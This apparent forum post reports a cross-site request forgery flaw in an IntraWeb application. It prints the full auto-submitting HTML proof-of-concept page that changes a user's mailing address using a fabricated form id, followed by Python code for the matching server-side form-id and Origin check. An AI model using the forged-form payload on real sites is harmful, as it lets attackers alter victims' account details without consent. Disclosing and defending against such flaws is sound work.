Alexandre Machado Wrote: I'll test it and let you know, although I don't have any details of your application....
The following is taken from the HTML page that successfully "attacked" my application. Notice the FormID is a made-up value (abc123). When this page was loaded in another tab in the browser while my application was running, it successfully updated the page in my application. I look forward to your test results. Thank you.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form name="csrf_request" action="https://www.website.com/ISAPI.dll/$/" method="POST">
  <input type="hidden" name="TXTADDR1" value="456 Fake St" />
  <input type="hidden" name="TXTADDR2" value="" />
  <input type="hidden" name="TXTADDR3" value="" />
  <input type="hidden" name="TXTCITY" value="Anytown" />
  <input type="hidden" name="TXTZIPCODE" value="53221" />
  <input type="hidden" name="CBXFOREIGNADDR_CHECKBOX" value="off" />
  <input type="hidden" name="TXTCOUNTRY" value="" />
  <input type="hidden" name="TXTSTATE" value="WI" />
  <input type="hidden" name="TXTBEGINDATE" value="12/27/2019" />
  <input type="hidden" name="TXTENDDATE" value="12/28/2019" />
  <input type="hidden" name="CMBLETTERDELIVERY" value="3" />
  <input type="hidden" name="TXTFAX" value="" />
  <input type="hidden" name="TXTEMAIL" value="" />
  <input type="hidden" name="TXTASF" value="" />
  <input type="hidden" name="BTTNASFCHANGE" value="" />
  <input type="hidden" name="CMDUPDATE" value="" />
  <input type="hidden" name="CMDCANCEL" value="" />
  <input type="hidden" name="CMDELECTRONICDELIVERY" value="" />
  <input type="hidden" name="CMDADDRESSUPDATE" value="" />
  <input type="hidden" name="IW_FormName" value="frmTempAddrUpdate" />
  <input type="hidden" name="IW_FormClass" value="TfrmTempAddrUpdate" />
  <input type="hidden" name="IW_FormID_" value="abc123" />
  <input type="hidden" name="IW_width" value="781" />
  <input type="hidden" name="IW_height" value="739" />
  <input type="hidden" name="IW_Action" value="CMDUPDATE" />
  <input type="hidden" name="IW_ActionParam" value="" />
</form>
<script>csrf_request.submit()</script>
</body>
</html>
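The post above shows that a submission carrying a fabricated IW_FormID_ was still processed. As an added illustration (not IntraWeb's code and not from anyone in this thread) of the server-side check that would reject it: the submitted IW_FormID_ must equal an unpredictable value issued to that session for that form, and the request's Origin (or Referer) must be the application's own. APP_ORIGIN, the session dict, the attacker origin and the field handling are all assumptions of this example.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Assumed origin of the protected application (matches the action URL in the post).
APP_ORIGIN = "https://www.website.com"


def issue_form_id(session: dict, form_name: str) -> str:
    """Mint an unpredictable per-session id for a form and remember it server-side.

    The value is what the legitimately rendered page would carry in IW_FormID_.
    A cross-site page cannot read it, so it cannot reproduce it in a forged POST.
    """
    form_id = secrets.token_urlsafe(24)
    session.setdefault("form_ids", {})[form_name] = form_id
    return form_id


def is_legit_post(session: dict, form_fields: dict, headers: dict) -> bool:
    """Return True only for a POST that a defender should process.

    Two independent checks, both must pass:
      1. IW_FormID_ equals the id issued to this session for IW_FormName
         (constant-time comparison, so a mismatch leaks no timing signal).
      2. The browser-supplied Origin (falling back to Referer) is APP_ORIGIN.
         Missing both headers fails closed.
    """
    form_name = form_fields.get("IW_FormName", "")
    expected = session.get("form_ids", {}).get(form_name)
    submitted = form_fields.get("IW_FormID_", "")
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False
    source = headers.get("Origin") or headers.get("Referer") or ""
    parsed = urlparse(source)
    return f"{parsed.scheme}://{parsed.netloc}" == APP_ORIGIN


if __name__ == "__main__":
    # Constructed scenario: a session that rendered frmTempAddrUpdate, then the
    # forged submission from the post (IW_FormID_ = "abc123") versus a real one.
    session = {}
    real_id = issue_form_id(session, "frmTempAddrUpdate")
    forged = {"IW_FormName": "frmTempAddrUpdate", "IW_FormID_": "abc123", "IW_Action": "CMDUPDATE"}
    genuine = {"IW_FormName": "frmTempAddrUpdate", "IW_FormID_": real_id, "IW_Action": "CMDUPDATE"}
    print("forged accepted? ", is_legit_post(session, forged, {"Origin": "https://attacker.example"}))
    print("genuine accepted?", is_legit_post(session, genuine, {"Origin": APP_ORIGIN}))
```

Either check alone stops the page in the post; keeping both means a leaked or guessed form id is still not enough from a foreign origin, and a same-origin bug is still not enough without the id.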